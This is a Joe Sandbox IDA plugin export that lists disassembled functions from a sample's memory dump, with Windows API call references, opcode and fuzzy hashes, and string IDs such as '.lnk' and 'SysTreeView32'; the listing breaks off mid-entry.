Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8206f1080f64cdcc43b1f50f58e49c61e87ae7c1f9215b54c915f7533ce256aa
Instruction ID: b3f811c166b7e2a511f6971e666c7ddc10360b9ec1d33ecbcfd9c328f21142d7
Opcode Fuzzy Hash: 8206f1080f64cdcc43b1f50f58e49c61e87ae7c1f9215b54c915f7533ce256aa
Instruction Fuzzy Hash: F0217170805308EFDB21CF69DD44BB97BB8FB00322F184236F811962A0D3719993DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 009BC176
_memcmp.LIBCMT ref: 009BC194
_memcmp.LIBCMT ref: 009BC1A7
_memcmp.LIBCMT ref: 009BC1BF
_memcmp.LIBCMT ref: 009BC1D7

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e17f6b0e242f9c19a60c668ed1c012a5a0e0e833a71aef2a0b3d88ca87cd94e9
Instruction ID: e32088c167e02f0962126d440c19a27521f39fb626df7f0fd81fc750f25c9330
Opcode Fuzzy Hash: e17f6b0e242f9c19a60c668ed1c012a5a0e0e833a71aef2a0b3d88ca87cd94e9
Instruction Fuzzy Hash: 660152F160910A7BE204B6295E42FFB775C9FA13A8B444025FE44B6283F6559E1283A1

Uniqueness

Uniqueness Score: -1.00%

Function 009C4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009C4D5C
__beginthreadex.LIBCMT ref: 009C4D7A
MessageBoxW.USER32(?,?,?,?), ref: 009C4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009C4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009C4DAC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 30a7ea789ea0de280400e83ab0730d0f966b2dd498112aa26be58a01e870a55c
Instruction ID: 8d31206039c04d72b6c2a9671889db3fcc54eff31b3306f8956d15070e546978
Opcode Fuzzy Hash: 30a7ea789ea0de280400e83ab0730d0f966b2dd498112aa26be58a01e870a55c
Instruction Fuzzy Hash: 76112572E08248BBC7109BA89C44FEB7BADEB44320F14426AF815D7290C6708D0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 009B874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009B8766
GetLastError.KERNEL32(?,009B822A,?,?,?), ref: 009B8770
GetProcessHeap.KERNEL32(00000008,?,?,009B822A,?,?,?), ref: 009B877F
HeapAlloc.KERNEL32(00000000,?,009B822A,?,?,?), ref: 009B8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009B879D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 287f4a6f03bea096b1b2d955aa72ec1422766e37049218fa35fd684d9d1e60de
Instruction ID: 0bdbf264093aefa4d37389e581b8f122773e6843fea9c0f39006b05d39713e77
Opcode Fuzzy Hash: 287f4a6f03bea096b1b2d955aa72ec1422766e37049218fa35fd684d9d1e60de
Instruction Fuzzy Hash: 79016D71214248FFDB204FA6DDD8DAB7BACFF8A765720043AF849C6260DE318C00DA60

Uniqueness

Uniqueness Score: -1.00%

Function 009C54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009C5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009C5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C555E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 309cec5a8b6c72d0e231333d8f70b97d685a2ae587498b9482f7d44cf4e8925b
Instruction ID: e4027b66082d5a0e15039afa80267f07d8d7edacaaf783fc6dddd6de55f2dd23
Opcode Fuzzy Hash: 309cec5a8b6c72d0e231333d8f70b97d685a2ae587498b9482f7d44cf4e8925b
Instruction Fuzzy Hash: 9C01A171C18A5DDBCF00DFE8E898AEDBB78FB09311F41005AE501F6240CB306990C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 009B7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?,?,009B799D), ref: 009B766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?), ref: 009B768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?), ref: 009B7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?), ref: 009B76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009B758C,80070057,?,?), ref: 009B76B4

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2de28bf3a3f0407611849825cff9107710d7b07f718d66c152f405ed218cff2b
Instruction ID: 4a1d75303e4e8082a57ecba12d3f1f3fb0c719f8ccb829d7309517fa6a3a9aa4
Opcode Fuzzy Hash: 2de28bf3a3f0407611849825cff9107710d7b07f718d66c152f405ed218cff2b
Instruction Fuzzy Hash: CB01D472615608FBDB104F98DD84BEABBACEB88761F100129FD05D6211E731DE00ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 009B85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009B8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009B8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009B8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009B8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009B863E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7c02b9a4878ec4bfae375fd9c294b62438bad7edf04e0a2a633536fa6542f1be
Instruction ID: 02ac755e8e47f0ba76fc1f20578a7691c35b2e511b4af3c2cdb916d4110dc7b8
Opcode Fuzzy Hash: 7c02b9a4878ec4bfae375fd9c294b62438bad7edf04e0a2a633536fa6542f1be
Instruction Fuzzy Hash: 1EF06231215244EFEB100FA5DDDDEAB3BACEF8A765B04442AF945CA190CB719C41EA60

Uniqueness

Uniqueness Score: -1.00%

Function 009B8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009B8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009B8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009B8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009B8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009B869F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8f684dd37e3843c4c500991bf8a4815e76b5fc97b350cd563678ea5d6c25379f
Instruction ID: 4bc2393186e519a71264031ab249ee4189e639b12092dce86ae7010eef2be07b
Opcode Fuzzy Hash: 8f684dd37e3843c4c500991bf8a4815e76b5fc97b350cd563678ea5d6c25379f
Instruction Fuzzy Hash: A1F06871214348FFDB111F65DCD8EA73BACEF89765B100026F545C6160DB71DD41EA60

Uniqueness

Uniqueness Score: -1.00%

Function 009BC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 009BC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 009BC6D1
MessageBeep.USER32(00000000), ref: 009BC6E9
KillTimer.USER32(?,0000040A), ref: 009BC705
EndDialog.USER32(?,00000001), ref: 009BC71F

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 96ed37c9b1802071f7177a151de70f3a7cfd2341bddde3cae75844dd7c76b10e
Instruction ID: 922bd5ad5ac4ce857ca0881e61d860ca74d1c546be962f2f74526217a163249c
Opcode Fuzzy Hash: 96ed37c9b1802071f7177a151de70f3a7cfd2341bddde3cae75844dd7c76b10e
Instruction Fuzzy Hash: B701AD70414708ABEB205B60DEDEFA677B8FF00B05F00066AF686A50E0DBF4AD549F80

Uniqueness

Uniqueness Score: -1.00%

Function 009613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009613BF
StrokeAndFillPath.GDI32(?,?,0099BAD8,00000000,?), ref: 009613DB
SelectObject.GDI32(?,00000000), ref: 009613EE
DeleteObject.GDI32 ref: 00961401
StrokePath.GDI32(?), ref: 0096141C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 61a5bfe734b8b606adb6127fa918cba8c553db8a5132131a1eb50bd62829e1a9
Instruction ID: bdec01ec4c4d3dae6c0dc94c49e1f1960b5ef1bf35501b8370b90d5640a136db
Opcode Fuzzy Hash: 61a5bfe734b8b606adb6127fa918cba8c553db8a5132131a1eb50bd62829e1a9
Instruction Fuzzy Hash: C7F0EC30019348EBDB259FAAEC4D7783FA8A701326F08C236E429495F1C7354997EF50

Uniqueness

Uniqueness Score: -1.00%

Function 009CC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009CC69D
CoCreateInstance.OLE32(009F2D6C,00000000,00000001,009F2BDC,?), ref: 009CC6B5

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

CoUninitialize.OLE32 ref: 009CC922

Strings

.lnk, xrefs: 009CC631, 009CC659, 009CC663

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: a8a059dfb084c9f1f6ec037fe2f14b0a2f5805df4ea669c67fe52acc24acfd69
Instruction ID: 593adbc99ec8827888c0b2647a0495f418b11e8ae6c801669fd541ac6a3c819c
Opcode Fuzzy Hash: a8a059dfb084c9f1f6ec037fe2f14b0a2f5805df4ea669c67fe52acc24acfd69
Instruction Fuzzy Hash: F4A12B71108205AFD700EF54C891EABB7ECEFD4714F04495DF1969B1A2DB70EA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00972E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00980FF6: std::exception::exception.LIBCMT ref: 0098102C
Part of subcall function 00980FF6: __CxxThrowException@8.LIBCMT ref: 00981041

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 00967BB1: _memmove.LIBCMT ref: 00967C0B

__swprintf.LIBCMT ref: 0097302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00972EC6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 20d0f13bd59721874356d2d627cb7d6e272b807611f18f6fd39a1693acd10e8e
Instruction ID: 94adc7e184b4107618bb3b2a29f2de45f14516afcb07004d5474e043ca9ef642
Opcode Fuzzy Hash: 20d0f13bd59721874356d2d627cb7d6e272b807611f18f6fd39a1693acd10e8e
Instruction Fuzzy Hash: D7919E721083019FC718EF64D995E6EB7B8EF86740F04891DF4969B2A1DB30EE44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009CBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 009648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009648A1,?,?,009637C0,?), ref: 009648CE

CoInitialize.OLE32(00000000), ref: 009CBC26
CoCreateInstance.OLE32(009F2D6C,00000000,00000001,009F2BDC,?), ref: 009CBC3F
CoUninitialize.OLE32 ref: 009CBC5C

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

Strings

.lnk, xrefs: 009CBC08, 009CBC16

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 85aa8cf09b6e2d737dcd57c7e2675ee12faf917a502acf231ffb2b6640af916a
Instruction ID: 721377d9b9ab91a6665cfa6e9d6020c0843d73ecda79228faea42834249ba845
Opcode Fuzzy Hash: 85aa8cf09b6e2d737dcd57c7e2675ee12faf917a502acf231ffb2b6640af916a
Instruction Fuzzy Hash: 80A111756042059FCB00DF18C495E6ABBE9FF89314F14899CF89A9B3A1CB31ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0098524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 009852DD

Part of subcall function 00990340: __87except.LIBCMT ref: 0099037B

Strings

pow, xrefs: 009852B5, 009852D2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 70544c8d41f947323a6d6cc6223334964d3bd699a624398ec6b08f95db3e1248
Instruction ID: ef4adf9946f8e53061c85089e8a11186a4fb4b86179bfdcdce2418e7a444aaa9
Opcode Fuzzy Hash: 70544c8d41f947323a6d6cc6223334964d3bd699a624398ec6b08f95db3e1248
Instruction Fuzzy Hash: A9513721A1DA01DBCF11B72CC94137E6B989B80750F218D69E4F5823E9EE788CD8DB46

Uniqueness

Uniqueness Score: -1.00%

Function 0098023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00980280
+, xrefs: 00980277

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 921f40b8041d98487b435e690c1f275104487afab0fb9f33e965e0a53b59aae0
Instruction ID: c62d7e3726fd335cbc8ae5e7b29e1e1b75b6c05929bb681e356f30ce2eadaaaf
Opcode Fuzzy Hash: 921f40b8041d98487b435e690c1f275104487afab0fb9f33e965e0a53b59aae0
Instruction Fuzzy Hash: FF51517510464ACFDF21EF68D4887FA7BA8EF9A320F15415AEC909B2E0C7349C46CB20

Uniqueness

Uniqueness Score: -1.00%

Function 009762F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009763A8
_memmove.LIBCMT ref: 00976446
_memset.LIBCMT ref: 0097646A

Strings

ERCP, xrefs: 00976313

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: e25b548f192c51fbf5813a79cf03c31cbf046553fb0f33706184ff479224581c
Instruction ID: 8d56e72ce114e2788087d9d6d78776173c379c3dcc87146fbb7d1669914f6c1f
Opcode Fuzzy Hash: e25b548f192c51fbf5813a79cf03c31cbf046553fb0f33706184ff479224581c
Instruction Fuzzy Hash: D751B2729007099FDB24CF65C8917EABBF8EF44714F20856EE54ECB251E771A584CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009EF910,00000000,?,?,?,?), ref: 009E7C4E
GetWindowLongW.USER32 ref: 009E7C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009E7C7B

Strings

SysTreeView32, xrefs: 009E7C20

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 6b900bdfd4d26bcb716e37e1ddec1c8a4435a8605d8fb2df1060ce74156fa78c
Instruction ID: 85e836c7a1aba324afc688c1ee18e9370d4382ab4a0a5b9aa9de11cc96d9f12a
Opcode Fuzzy Hash: 6b900bdfd4d26bcb716e37e1ddec1c8a4435a8605d8fb2df1060ce74156fa78c
Instruction Fuzzy Hash: 8631DE31204289ABDB128F79DC41BEAB7ADEB45324F244725F8B5922E0C731EC519B60

Uniqueness

Uniqueness Score: -1.00%

Function 009E7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009E76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009E76E4
